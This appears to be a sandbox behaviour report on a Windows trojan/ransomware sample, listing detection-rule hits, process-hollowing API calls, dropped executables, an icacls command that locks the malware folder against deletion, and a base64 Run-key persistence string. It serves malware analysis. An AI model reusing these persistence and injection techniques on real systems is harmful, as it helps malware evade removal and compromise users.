                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\Temp\1543.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: String function: 03950160 appears 31 times
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: String function: 03948EC0 appears 38 times
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: String function: 0042F7C0 appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: String function: 0044F23E appears 44 times
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: String function: 00428520 appears 51 times
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: String function: 004547A0 appears 31 times
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401558
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,0_2_00401749
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401564
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401577
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401523
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401585
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040158C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040159A
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401558
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_00401749 NtMapViewOfSection,NtMapViewOfSection,4_2_00401749
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401564
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401577
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401523
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401585
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040158C
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040159A
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_03920110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,5_2_03920110
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uwjrhssJump to behavior
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@70/195@53/19
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,6_2_00411900
                Source: file.exeReversingLabs: Detection: 35%
                Source: file.exeVirustotal: Detection: 40%
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\uwjrhss C:\Users\user\AppData\Roaming\uwjrhss
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe C:\Users\user\AppData\Local\Temp\9721.exe
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe C:\Users\user\AppData\Local\Temp\9721.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\124D.exe C:\Users\user\AppData\Local\Temp\124D.exe
                Source: C:\Users\user\AppData\Local\Temp\124D.exeProcess created: C:\Users\user\AppData\Local\Temp\124D.exe C:\Users\user\AppData\Local\Temp\124D.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe C:\Users\user\AppData\Local\Temp\46F.exe
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F42F.exe C:\Users\user\AppData\Local\Temp\F42F.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe C:\Users\user\AppData\Local\Temp\46F.exe
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeProcess created: C:\Users\user\AppData\Local\Temp\F42F.exe C:\Users\user\AppData\Local\Temp\F42F.exe
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe "C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe "C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6E6C.exe C:\Users\user\AppData\Local\Temp\6E6C.exe
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeProcess created: C:\Users\user\AppData\Local\Temp\6E6C.exe C:\Users\user\AppData\Local\Temp\6E6C.exe
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe "C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe "C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E3B7.exe C:\Users\user\AppData\Local\Temp\E3B7.exe
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4C9F.exe C:\Users\user\AppData\Local\Temp\4C9F.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3971.exe C:\Users\user\AppData\Local\Temp\3971.exe
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe"
                Source: C:\Users\user\AppData\Local\Temp\3971.exeProcess created: C:\Users\user\AppData\Local\Temp\3971.exe C:\Users\user\AppData\Local\Temp\3971.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AB42.exe C:\Users\user\AppData\Local\Temp\AB42.exe
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: C:\Users\user\AppData\Local\Temp\oldplayer.exe "C:\Users\user\AppData\Local\Temp\oldplayer.exe"
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe"
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe C:\Users\user\AppData\Local\Temp\9721.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\124D.exe C:\Users\user\AppData\Local\Temp\124D.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe C:\Users\user\AppData\Local\Temp\46F.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F42F.exe C:\Users\user\AppData\Local\Temp\F42F.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6E6C.exe C:\Users\user\AppData\Local\Temp\6E6C.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStartJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E3B7.exe C:\Users\user\AppData\Local\Temp\E3B7.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4C9F.exe C:\Users\user\AppData\Local\Temp\4C9F.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3971.exe C:\Users\user\AppData\Local\Temp\3971.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStartJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AB42.exe C:\Users\user\AppData\Local\Temp\AB42.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe C:\Users\user\AppData\Local\Temp\9721.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeProcess created: C:\Users\user\AppData\Local\Temp\124D.exe C:\Users\user\AppData\Local\Temp\124D.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe C:\Users\user\AppData\Local\Temp\46F.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeProcess created: C:\Users\user\AppData\Local\Temp\F42F.exe C:\Users\user\AppData\Local\Temp\F42F.exeJump to behavior
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe "C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe"
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe"
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeProcess created: C:\Users\user\AppData\Local\Temp\6E6C.exe C:\Users\user\AppData\Local\Temp\6E6C.exe
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe "C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: C:\Users\user\AppData\Local\Temp\oldplayer.exe "C:\Users\user\AppData\Local\Temp\oldplayer.exe"
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\3971.exeProcess created: C:\Users\user\AppData\Local\Temp\3971.exe C:\Users\user\AppData\Local\Temp\3971.exe
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\Temp\AB42.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9721.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,6_2_0040D240
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_01E674BB CreateToolhelp32Snapshot,Module32First,4_2_01E674BB
                Source: E3B7.exe.3.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                Source: 1543.exe.3.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                Source: 28.0.E3B7.exe.e30000.0.unpack, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                Source: C:\Users\user\AppData\Local\Temp\9721.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exeMutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
                Source: 9721.exeString found in binary or memory: set-addPolicy
                Source: 9721.exeString found in binary or memory: id-cmc-addExtensions
                Source: 9721.exeString found in binary or memory: set-addPolicy
                Source: 9721.exeString found in binary or memory: id-cmc-addExtensions
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\46F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\46F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\46F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\46F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\46F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\3971.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\3971.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
